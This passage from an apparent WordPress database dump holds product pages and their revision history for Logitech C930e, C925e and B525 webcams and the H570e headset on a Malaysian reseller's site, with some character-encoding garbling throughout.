ease.</p><h4>4X HD ZOOM</h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.</p><h4>MOUNTING &amp; PRIVACY OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.</p><h4>CAMERA SETTINGS</h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.</p>','Logitech C930E','','inherit','closed','closed','','2999-revision-v1','','','2019-03-04 17:42:37','2019-03-04 09:42:37','',2999,'https://bintara.com.my/blog/2019/03/04/2999-revision-v1/',0,'revision','',0),(3007,1,'2019-03-05 14:09:06','2019-03-05 06:09:06','<h2>LOGITECH C925E</h2><p>Affordable 1080p HD webcam with integrated privacy shade</p><ul><li>Designed for desktop video conferencing</li><li>RightLightâ„¢ 2 ensures clear video with typical office lighting</li><li>Sliding internal shade assures privacy</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>LOGITECH C925E</h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>MORE PRODUCTIVE CALLS</h3><p>When you canâ€™t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.</p><h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLightâ„¢ 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>VERSATILE MOUNTING OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C925e on your own tripod instead.</p><h4>CONVENIENT PRIVACY SHADE</h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.</p><p>[maxbutton id=\"3\" ]</p>','Logitech C925E','','publish','closed','closed','','logitech-c925e','','','2019-03-05 17:31:37','2019-03-05 09:31:37','',0,'https://bintara.com.my/?page_id=3007',0,'page','',0),(3008,1,'2019-03-05 14:09:28','2019-03-05 06:09:28','<h2>LOGITECH B525</h2><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p><ul><li>1080p HD quality in a compact form factor</li><li>Folds for grab-and-go convenience</li><li>360Â° swivel so you can point in any direction</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>PORTABLE HD VIDEO CAMERA</h2><p>For on-the-go professionals, Logitech B525 HD Webcam makes it easy to bring a webcam to every meeting. The compact, folding design simplifies travel, and features a universal mounting clip for your laptop or other device. High-definition video presents clear images for every participant to see.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>HIGH-QUALITY IMAGE AND SOUND</h3><p>Image quality is important for your business meetings. The affordable B525 HD Webcam, capturing 1080p Full HD video at 30 frames per second, delivers clear images even in low-light conditions. Built-in autofocus maintains sharpness as close as 10 cm.</p><h3>EASY TO SET UP AND USE</h3><p>Plug and play to start every meeting on time. The B525 HD Webcam works with all leading video conferencing software for PC and Mac. The convenient fold-and-go design lets you pack the camera and take it with you. Just attach it to your laptop and begin your meeting.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PERSONAL FIELD OF VIEW</h4><p>With a 69-degree field of view, B525 captures an ideal head-and-shoulders frame for distraction-free video conferencing.</p><h4>FOLD AND GO</h4><p>Perfect for road warriors, B525 folds to a compact, bag-friendly size, which also protects the lens from scuffs and scrapes.</p><h4>AIM AT THE ACTION</h4><p>B525 swivels a full 360 degree on its mount so you can aim the camera at yourself, your customer, or anywhere in the room.</p>','Logitech B525','','publish','closed','closed','','logitech-b525','','','2019-03-05 16:06:54','2019-03-05 08:06:54','',0,'https://bintara.com.my/?page_id=3008',0,'page','',0),(3009,1,'2019-03-05 16:08:18','2019-03-05 08:08:18','<h2>LOGITECH H570E HEADSET</h2><p>Comfortable, affordable, and built to last</p><ul><li>Strong and light for long-term comfort</li><li>Easy-to-find inline controls</li><li>Clear audio at a great price</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>AFFORDABLE CLARITY AND COMFORT</h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. Itâ€™s easy to use as well: just connect it to a PC or MacÂ® through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>GREAT VALUE FOR GREAT FEATURES</h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.</p><h3>COMFORTABLE AND LONG-LASTING</h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>REINFORCED PADDED HEADBAND</h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and â€œjust the rightâ€ fit.</p><h4>NOISE &amp; ECHO CANCELLATION</h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.</p><h4>NO-LOOK INLINE CONTROLS</h4><p>Control the call with answer/end, volume up/down and mute buttons. A flat and flexible cable resists tangles.</p><h4>OPTIMIZED FOR VOICE AND MUSIC</h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.</p>','Logitech H570E Headset','','publish','closed','closed','','logitech-h570e-headset','','','2019-03-05 16:16:20','2019-03-05 08:16:20','',0,'https://bintara.com.my/?page_id=3009',0,'page','',0),(3072,1,'2019-07-27 15:51:57','0000-00-00 00:00:00','Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Elementor #3072','','draft','closed','closed','','','','','2019-07-27 15:51:57','2019-07-27 07:51:57','',0,'https://bintara.com.my/?page_id=3072',0,'page','',0),(3073,1,'2019-07-27 15:50:51','2019-07-27 07:50:51','','Elementor #3072','','inherit','closed','closed','','3072-revision-v1','','','2019-07-27 15:50:51','2019-07-27 07:50:51','',3072,'https://bintara.com.my/blog/2019/07/27/3072-revision-v1/',0,'revision','',0),(3011,1,'2019-03-05 14:09:06','2019-03-05 06:09:06','','Logitech C925E','','inherit','closed','closed','','3007-revision-v1','','','2019-03-05 14:09:06','2019-03-05 06:09:06','',3007,'https://bintara.com.my/blog/2019/03/05/3007-revision-v1/',0,'revision','',0),(3012,1,'2019-03-05 14:09:28','2019-03-05 06:09:28','','Logitech B525','','inherit','closed','closed','','3008-revision-v1','','','2019-03-05 14:09:28','2019-03-05 06:09:28','',3008,'https://bintara.com.my/blog/2019/03/05/3008-revision-v1/',0,'revision','',0),(3013,1,'2019-03-05 14:12:36','2019-03-05 06:12:36','','c925e-webcam (1)','','inherit','closed','closed','','c925e-webcam-1','','','2019-03-05 14:12:36','2019-03-05 06:12:36','',3007,'https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png',0,'attachment','image/png',0),(3014,1,'2019-03-05 14:14:31','2019-03-05 06:14:31','','c925e-webcam','','inherit','closed','closed','','c925e-webcam-2','','','2019-03-05 14:14:31','2019-03-05 06:14:31','',3007,'https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg',0,'attachment','image/jpeg',0),(3015,1,'2019-03-05 14:15:24','2019-03-05 06:15:24','','c925e-webcam (1)','','inherit','closed','closed','','c925e-webcam-1-2','','','2019-03-05 14:15:24','2019-03-05 06:15:24','',3007,'https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg',0,'attachment','image/jpeg',0),(3016,1,'2019-03-05 14:17:42','2019-03-05 06:17:42','<h2>LOGITECH C925E</h2><p>Affordable 1080p HD webcam with integrated privacy shade</p><ul><li>Designed for desktop video conferencing</li><li>RightLightâ„¢ 2 ensures clear video with typical office lighting</li><li>Sliding internal shade assures privacy</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>LOGITECH C925E</h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>MORE PRODUCTIVE CALLS</h3><p>When you canâ€™t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.</p><h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLightâ„¢ 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>VERSATILE MOUNTING OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C925e on your own tripod instead.</p><h4>CONVENIENT PRIVACY SHADE</h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.</p>','Logitech C925E','','inherit','closed','closed','','3007-revision-v1','','','2019-03-05 14:17:42','2019-03-05 06:17:42','',3007,'https://bintara.com.my/blog/2019/03/05/3007-revision-v1/',0,'revision','',0),(3017,1,'2019-03-05 14:18:06','2019-03-05 06:18:06','<h2>LOGITECH C925E</h2><p>Affordable 1080p HD webcam with integrated privacy shade</p><ul><li>Designed for desktop video conferencing</li><li>RightLightâ„¢ 2 ensures clear video with typical office lighting</li><li>Sliding internal shade assures privacy</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>LOGITECH C925E</h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>MORE PRODUCTIVE CALLS</h3><p>When you canâ€™t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.</p><h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLightâ„¢ 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>VERSATILE MOUNTING OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C925e on your own tripod instead.</p><h4>CONVENIENT PRIVACY SHADE</h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.</p>','Logitech C925E','','inherit','closed','closed','','3007-revision-v1','','','2019-03-05 14:18:06','2019-03-05 06:18:06','',3007,'https://bintara.com.my/blog/2019/03/05/3007-revision-v1/',0,'revision','',0),(3018,1,'2019-03-05 14:18:59','2019-03-05 06:18:59','','b525-pdp-2017-refresh (1)','','inherit','closed','closed','','b525-pdp-2017-refresh-1','','','2019-03-05 14:18:59','2019-03-05 06:18:59','',3008,'https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.png',0,'attachment','image/png',0),(3019,1,'2019-03-05 14:20:37','2019-03-05 06:20:37','','b525-pdp-2017-refresh','','inherit','closed','closed','','b525-pdp-2017-refresh-2','','','2019-03-05 14:20:37','2019-03-05 06:20:37','',3008,'https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh.jpg',0,'attachment','image/jpeg',0),(3022,1,'2019-03-05 16:06:54','2019-03-05 08:06:54','<h2>LOGITECH B525</h2><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p><ul><li>1080p HD quality in a compact form factor</li><li>Folds for grab-and-go convenience</li><li>360Â° swivel so you can point in any direction</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>PORTABLE HD VIDEO CAMERA</h2><p>For on-the-go professionals, Logitech B525 HD Webcam makes it easy to bring a webcam to every meeting. The compact, folding design simplifies travel, and features a universal mounting clip for your laptop or other device. High-definition video presents clear images for every participant to see.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>HIGH-QUALITY IMAGE AND SOUND</h3><p>Image quality is important for your business meetings. The affordable B525 HD Webcam, capturing 1080p Full HD video at 30 frames per second, delivers clear images even in low-light conditions. Built-in autofocus maintains sharpness as close as 10 cm.</p><h3>EASY TO SET UP AND USE</h3><p>Plug and play to start every meeting on time. The B525 HD Webcam works with all leading video conferencing software for PC and Mac. The convenient fold-and-go design lets you pack the camera and take it with you. Just attach it to your laptop and begin your meeting.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PERSONAL FIELD OF VIEW</h4><p>With a 69-degree field of view, B525 captures an ideal head-and-shoulders frame for distraction-free video conferencing.</p><h4>FOLD AND GO</h4><p>Perfect for road warriors, B525 folds to a compact, bag-friendly size, which also protects the lens from scuffs and scrapes.</p><h4>AIM AT THE ACTION</h4><p>B525 swivels a full 360 degree on its mount so you can aim the camera at yourself, your customer, or anywhere in the room.</p>','Logitech B525','','inherit','closed','closed','','3008-revision-v1','','','2019-03-05 16:06:54','2019-03-05 08:06:54','',3008,'https://bintara.com.my/blog/2019/03/05/3008-revision-v1/',0,'revision','',0),(3021,1,'2019-03-05 14:47:21','2019-03-05 06:47:21','','b525-pdp-2017-refresh (1)','','inherit','closed','closed','','b525-pdp-2017-refresh-1-2','','','2019-03-05 14:47:21','2019-03-05 06:47:21','',3008,'https://bintara.com.my/wp-content/uploads/2019/03/b525-pdp-2017-refresh-1.jpg',0,'attachment','image/jpeg',0),(3023,1,'2019-03-05 16:08:18','2019-03-05 08:08:18','','Logitech H570E Headset','','inherit','closed','closed','','3009-revision-v1','','','2019-03-05 16:08:18','2019-03-05 08:08:18','',3009,'https://bintara.com.my/blog/2019/03/05/3009-revision-v1/',0,'revision','',0),(3024,1,'2019-03-05 16:09:51','2019-03-05 08:09:51','<p>LOGITECH H570E HEADSET</p><p>Comfortable, affordable, and built to last</p><ul><li>Strong and light for long-term comfort</li><li>Easy-to-find inline controls</li><li>Clear audio at a great price</li></ul>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />','Logitech H570E Headset','','inherit','closed','closed','','3009-revision-v1','','','2019-03-05 16:09:51','2019-03-05 08:09:51','',3009,'https://bintara.com.my/blog/2019/03/05/3009-revision-v1/',0,'revision','',0),(3025,1,'2019-03-05 16:10:04','2019-03-05 08:10:04','','h570e-headset (1)','','inherit','closed','closed','','h570e-headset-1','','','2019-03-05 16:10:04','2019-03-05 08:10:04','',3009,'https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png',0,'attachment','image/png',0),(3026,1,'2019-03-05 16:12:17','2019-03-05 08:12:17','','h570e-headset','','inherit','closed','closed','','h570e-headset-2','','','2019-03-05 16:12:17','2019-03-05 08:12:17','',3009,'https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg',0,'attachment','image/jpeg',0),(3027,1,'2019-03-05 16:13:14','2019-03-05 08:13:14','','h570e-headset (1)','','inherit','closed','closed','','h570e-headset-1-2','','','2019-03-05 16:13:14','2019-03-05 08:13:14','',3009,'https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg',0,'attachment','image/jpeg',0),(3028,1,'2019-03-05 16:15:48','2019-03-05 08:15:48','<p>LOGITECH H570E HEADSET</p><p>Comfortable, affordable, and built to last</p><ul><li>Strong and light for long-term comfort</li><li>Easy-to-find inline controls</li><li>Clear audio at a great price</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>AFFORDABLE CLARITY AND COMFORT</h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. Itâ€™s easy to use as well: just connect it to a PC or MacÂ® through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>GREAT VALUE FOR GREAT FEATURES</h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.</p><h3>COMFORTABLE AND LONG-LASTING</h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>KEY FEATURES</h4>		\n		<h4>REINFORCED PADDED HEADBAND</h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and â€œjust the rightâ€ fit.</p><h4>NOISE &amp; ECHO CANCELLATION</h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.</p><h4>NO-LOOK INLINE CONTROLS</h4><p>Control the call with answer/end, volume up/down and mute buttons. A flat and flexible cable resists tangles.</p><h4>OPTIMIZED FOR VOICE AND MUSIC</h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.</p>','Logitech H570E Headset','','inherit','closed','closed','','3009-revision-v1','','','2019-03-05 16:15:48','2019-03-05 08:15:48','',3009,'https://bintara.com.my/blog/2019/03/05/3009-revision-v1/',0,'revision','',0),(3029,1,'2019-03-05 16:15:59','2019-03-05 08:15:59','<p>LOGITECH H570E HEADSET</p><p>Comfortable, affordable, and built to last</p><ul><li>Strong and light for long-term comfort</li><li>Easy-to-find inline controls</li><li>Clear audio at a great price</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>AFFORDABLE CLARITY AND COMFORT</h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. Itâ€™s easy to use as well: just connect it to a PC or MacÂ® through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>GREAT VALUE FOR GREAT FEATURES</h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.</p><h3>COMFORTABLE AND LONG-LASTING</h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/h570e-headset-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>REINFORCED PADDED HEADBAND</h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and â€œjust the rightâ€ fit.</p><h4>NOISE &amp; ECHO CANCELLATION</h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is 